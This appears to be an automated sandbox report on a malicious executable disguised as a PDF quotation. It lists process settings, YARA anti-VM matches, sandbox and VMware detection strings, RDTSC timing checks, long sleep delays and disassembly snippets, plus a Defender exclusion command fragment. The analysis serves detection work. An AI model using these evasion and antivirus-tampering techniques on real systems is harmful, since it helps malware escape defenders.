          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: 1.2.QUOTATION PDF_SCAN_COPY.exe.2ae091c.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.QUOTATION PDF_SCAN_COPY.exe.2b961c0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.746575972.0000000002B82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.745531520.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: QUOTATION PDF_SCAN_COPY.exe PID: 6844, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.746575972.0000000002B82000.00000004.00000800.00020000.00000000.sdmp, QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.745531520.0000000002A81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.746575972.0000000002B82000.00000004.00000800.00020000.00000000.sdmp, QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.745531520.0000000002A81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000003279904 second address: 000000000327990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000003279B6E second address: 0000000003279B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe TID: 6840Thread sleep time: -40434s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe TID: 6992Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6452Thread sleep time: -8301034833169293s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_00409AA0 rdtsc 11_2_00409AA0
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7155Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1220Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeAPI coverage: 9.1 %
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeThread delayed: delay time: 40434Jump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.745531520.0000000002A81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 0000001A.00000002.976202611.0000000008135000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000D.00000000.822859782.0000000004791000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA
          Source: explorer.exe, 0000001A.00000002.976202611.0000000008135000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}/
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.745531520.0000000002A81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000001A.00000002.976202611.0000000008135000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000D.00000000.759263988.000000000A897000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.745531520.0000000002A81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000001A.00000002.973762856.0000000004514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000001A.00000002.976202611.0000000008135000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000D.00000000.753506570.0000000006650000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000D.00000000.757508985.000000000A60E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001A.00000002.973762856.0000000004514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000D.00000000.772378889.000000000A716000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 0000001A.00000002.976202611.0000000008135000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}KTOP
          Source: explorer.exe, 0000001A.00000000.948419680.00000000080F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 0000001A.00000000.946402054.00000000060E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000b
          Source: explorer.exe, 0000000D.00000000.751020546.0000000004710000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 0000000D.00000000.772378889.000000000A716000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 0000000D.00000000.760746983.000000000FD2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 63}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&d
          Source: explorer.exe, 0000000D.00000000.772627409.000000000A784000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 0000001A.00000002.975771348.0000000007F9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000s
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.745531520.0000000002A81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_00409AA0 rdtsc 11_2_00409AA0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B8B58 mov eax, dword ptr fs:[00000030h]19_2_035B8B58
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034EDB40 mov eax, dword ptr fs:[00000030h]19_2_034EDB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034EF358 mov eax, dword ptr fs:[00000030h]19_2_034EF358
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03513B7A mov eax, dword ptr fs:[00000030h]19_2_03513B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03513B7A mov eax, dword ptr fs:[00000030h]19_2_03513B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034EDB60 mov ecx, dword ptr fs:[00000030h]19_2_034EDB60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A131B mov eax, dword ptr fs:[00000030h]19_2_035A131B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035653CA mov eax, dword ptr fs:[00000030h]19_2_035653CA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035653CA mov eax, dword ptr fs:[00000030h]19_2_035653CA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035103E2 mov eax, dword ptr fs:[00000030h]19_2_035103E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035103E2 mov eax, dword ptr fs:[00000030h]19_2_035103E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035103E2 mov eax, dword ptr fs:[00000030h]19_2_035103E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035103E2 mov eax, dword ptr fs:[00000030h]19_2_035103E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035103E2 mov eax, dword ptr fs:[00000030h]19_2_035103E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035103E2 mov eax, dword ptr fs:[00000030h]19_2_035103E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350DBE9 mov eax, dword ptr fs:[00000030h]19_2_0350DBE9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F1B8F mov eax, dword ptr fs:[00000030h]19_2_034F1B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F1B8F mov eax, dword ptr fs:[00000030h]19_2_034F1B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351B390 mov eax, dword ptr fs:[00000030h]19_2_0351B390
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03512397 mov eax, dword ptr fs:[00000030h]19_2_03512397
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A138A mov eax, dword ptr fs:[00000030h]19_2_035A138A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0359D380 mov ecx, dword ptr fs:[00000030h]19_2_0359D380
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03514BAD mov eax, dword ptr fs:[00000030h]19_2_03514BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03514BAD mov eax, dword ptr fs:[00000030h]19_2_03514BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03514BAD mov eax, dword ptr fs:[00000030h]19_2_03514BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B5BA5 mov eax, dword ptr fs:[00000030h]19_2_035B5BA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03574257 mov eax, dword ptr fs:[00000030h]19_2_03574257
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E9240 mov eax, dword ptr fs:[00000030h]19_2_034E9240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E9240 mov eax, dword ptr fs:[00000030h]19_2_034E9240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E9240 mov eax, dword ptr fs:[00000030h]19_2_034E9240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E9240 mov eax, dword ptr fs:[00000030h]19_2_034E9240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035AEA55 mov eax, dword ptr fs:[00000030h]19_2_035AEA55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0352927A mov eax, dword ptr fs:[00000030h]19_2_0352927A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0359B260 mov eax, dword ptr fs:[00000030h]19_2_0359B260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0359B260 mov eax, dword ptr fs:[00000030h]19_2_0359B260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B8A62 mov eax, dword ptr fs:[00000030h]19_2_035B8A62
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F8A0A mov eax, dword ptr fs:[00000030h]19_2_034F8A0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03503A1C mov eax, dword ptr fs:[00000030h]19_2_03503A1C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035AAA16 mov eax, dword ptr fs:[00000030h]19_2_035AAA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035AAA16 mov eax, dword ptr fs:[00000030h]19_2_035AAA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034EAA16 mov eax, dword ptr fs:[00000030h]19_2_034EAA16
